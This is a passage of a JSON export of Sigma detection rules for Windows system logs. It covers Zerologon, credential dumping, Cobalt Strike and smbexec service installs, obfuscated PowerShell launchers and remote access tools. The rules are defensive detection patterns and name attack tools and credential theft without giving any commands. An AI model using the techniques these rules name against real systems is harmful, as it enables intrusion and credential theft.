"https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/22H2/W10_22H2_Pro_20230321_19045.2728/WEPExplorer/LsaSrv.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "value": "NTLMv1 Logon Between Client and Server" }, { "description": "Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.\n", "meta": { "author": "frack113", "creation_date": "2021-12-04", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_system_update_error.yml", "level": "informational", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_windows_update_client/win_system_susp_system_update_error.yml" ], "tags": [ "attack.impact", "attack.resource-development", "attack.t1584" ] }, "related": [ { "dest-uuid": "7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "value": "Windows Update Error" }, { "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", "meta": { "author": "Cybex", "creation_date": "2022-08-16", "falsepositive": [ "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_user_profiles_service/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" ], "tags": [ "attack.execution" ] }, "uuid": "52a85084-6989-40c3-8f32-091e12e17692", "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919" }, { "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", "meta": { "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "creation_date": "2020-10-13", "falsepositive": "No established falsepositives", "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", "https://www.secura.com/blog/zero-logon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" ], "tags": [ "attack.t1210", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", "value": "Zerologon Exploitation Using Well-known Tools" }, { "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", "meta": { "author": "NVISO", "creation_date": "2020-09-15", "falsepositive": [ "Unknown" ], "filename": "win_system_vul_cve_2020_1472.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", "value": "Vulnerable Netlogon Secure Channel Connection Allowed" }, { "description": "Detects well-known credential dumping tools execution via service execution events", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "creation_date": "2017-03-05", "falsepositive": [ "Legitimate Administrator using credential dumping tool for password recovery" ], "filename": "win_system_mal_creddumper.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml" ], "tags": [ "attack.credential-access", "attack.execution", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "attack.t1003.006", "attack.t1569.002", "attack.s0005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "value": "Credential Dumping Tools Service Execution - System" }, { "description": "Detects powershell script installed as a Service", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "win_system_powershell_script_installed_as_service.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "value": "PowerShell Scripts Installed as Services" }, { "description": "Detects PAExec service installation", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_paexec.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", "value": "PAExec Service Installation" }, { "description": "Detects suspicious service installation commands", "meta": { "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_susp.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "car.2013-09-005", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "value": "Suspicious Service Installation" }, { "description": "Detects the use of smbexec.py tool by detecting a specific service installation", "meta": { "author": "Omer Faruk Celik", "creation_date": "2018-03-20", "falsepositive": [ "Unknown" ], "filename": "win_system_hack_smbexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60", "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", "https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml" ], "tags": [ "attack.lateral-movement", "attack.execution", "attack.t1021.002", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", "value": "smbexec.py Service Installation" }, { "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", "value": "Invoke-Obfuscation Via Use Rundll32 - System" }, { "description": "Detects important or interesting Windows services that got terminated for whatever reason", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "Rare false positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_error_important.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "value": "Important Windows Service Terminated With Error" }, { "description": "Detects Windows services that got terminated for whatever reason", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "False positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_error_generic.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "acfa2210-0d71-4eeb-b477-afab494d596c", "value": "Windows Service Terminated With Error" }, { "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_pdqdeploy_runner.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", "value": "New PDQDeploy Service - Client Side" }, { "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "win_system_service_install_tap_driver.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "value": "Tap Driver Installation" }, { "description": "Detects Remote Utilities Host service installation on the target system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_remote_utilities.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "value": "Remote Utilities Host Service Install" }, { "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_var_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "value": "Invoke-Obfuscation VAR+ Launcher - System" }, { "description": "Detects installation or execution of services", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-21", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_hacktools.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", "value": "HackTool Service Registration or Execution" }, { "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" }, { "description": "Detects when the \"Windows Defender Threat Protection\" service is disabled.", "meta": { "author": "Ján Trenčanský, frack113", "creation_date": "2020-07-28", "falsepositive": [ "Administrator actions", "Auto updates of Windows Defender causes restarts" ], "filename": "win_system_defender_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", "value": "Windows Defender Threat Detection Service Disabled" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", "value": "Invoke-Obfuscation Via Stdin - System" }, { "description": "Detects important or interesting Windows services that got terminated unexpectedly.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-14", "falsepositive": [ "Rare false positives could occur since service termination could happen due to multiple reasons" ], "filename": "win_system_service_terminated_unexpectedly.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "56abae0c-6212-4b97-adc0-0b559bb950c3", "value": "Important Windows Service Terminated Unexpectedly" }, { "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)", "meta": { "author": "Sittikorn S, Tim Shelton", "creation_date": "2022-05-11", "falsepositive": [ "Unknown" ], "filename": "win_system_krbrelayup_service_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Dec0ne/KrbRelayUp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "value": "KrbRelayUp Service Installation" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", "meta": { "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "creation_date": "2021-05-26", "falsepositive": [ "Unknown" ], "filename": "win_system_cobaltstrike_service_installs.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", "value": "CobaltStrike Service Installations - System" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_compress_services.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" }, { "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", "meta": { "author": "Connor Martin, Nasreddine Bencherchali", "creation_date": "2022-12-23", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_remote_access_software.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml" ], "tags": [ "attack.persistence", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a31b18a-f00c-4061-9900-f735b96c99fc", "value": "Remote Access Tool Services Have Been Installed - System" }, { "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_rtcore64_service_install.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "value": "RTCore Suspicious Service Installation" }, { "description": "Detects NetSupport Manager service installation on the target system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_netsupport_manager.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "value": "NetSupport Manager Service Install" }, { "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Unlikely" ], "filename": "win_system_service_install_pua_proceshacker.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/1kwpeter/status/1397816101455765504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "value": "ProcessHacker Privilege Elevation" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_var_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" }, { "description": "Detects service installation in suspicious folder appdata", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2022-03-18", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_service_installation_folder.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": 